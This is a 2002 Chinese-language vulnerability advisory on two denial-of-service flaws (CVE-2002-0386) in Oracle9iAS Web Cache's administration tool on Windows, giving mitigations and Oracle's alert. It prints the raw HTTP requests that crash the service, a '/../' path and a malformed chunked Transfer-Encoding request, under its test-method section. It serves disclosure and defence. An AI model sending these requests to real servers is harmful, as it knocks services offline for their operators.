发布日期：2002-10-28
更新日期：2002-10-31

受影响系统：

Oracle Web Cache

描述：

---

BUGTRAQ  ID: 5902
CVE(CAN) ID: CVE-2002-0386

Oracle Web Cache是Oracle应用服务程序套件中的一部分，Web Cache设计用于在Oracle Web服务器前端作为缓冲反向代理服务器。

Oracle9iAS 9.0.2所带的Web Cache 管理模块即Web缓冲管理工具存在两个拒绝服务条件，远程攻击者可以利用这两个漏洞对服务程序进行拒绝服务攻击，导致停止对正常请求的响应。

存在两个不同的拒绝服务条件，都会引起Web Cache服务崩溃，拒绝服务可以通过发送简单的HTTP请求触发。

第一个拒绝服务攻击可以发送包含至少一个'/../'字符的HTTP GET请求，可导致Web Cache服务崩溃：

GET /../ HTTP/1.0
Host: whatever
[CRLF]
[CRLF]

第二个拒绝服务攻击可以通过畸形的GET请求触发：

GET / HTTP/1.0
Host: whatever
Transfer-Encoding: chunked
[CRLF]
[CRLF]

这两个漏洞只存在于Windows版本下的Oracle Web Cache系统。

<*来源：@stake advisories （advisories@atstake.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103583467206317&w=2
        http://www.debian.org/security/2002/dsa-173
        http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Request 1:
GET /../ HTTP/1.1
host: hostname
Enter
Enter

Request 2:
GET /some.html/ HTTP/1.1
host: host name
Transfer Encoding
Enter
Enter

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 目前Oracle还没有提供补丁，建议客户使用访问控制限制未授权用户对管理端口的访问：

1、使用防火墙技术限制访问Web Cache管理端口。
2、使用Web Cache管理工具中的"Secure Subnet"功能提供允许访问管理端口的IP地址列表或者子网段。

厂商补丁：

Oracle
------
Oracle已经为此发布了一个安全公告（OracleSA#43）:
OracleSA#43：Oracle9i Application Server - Web Cache Administration Tool Crash on Malformed Request
链接：http://otn.oracle.com/deploy/security/pdf/2002alert43rev1.pdf

但Oracle尚未提供补丁下载, 它将在Oracle9iAS 9.0.4中修复上述漏洞.

浏览次数：2831
严重程度：0（网友投票）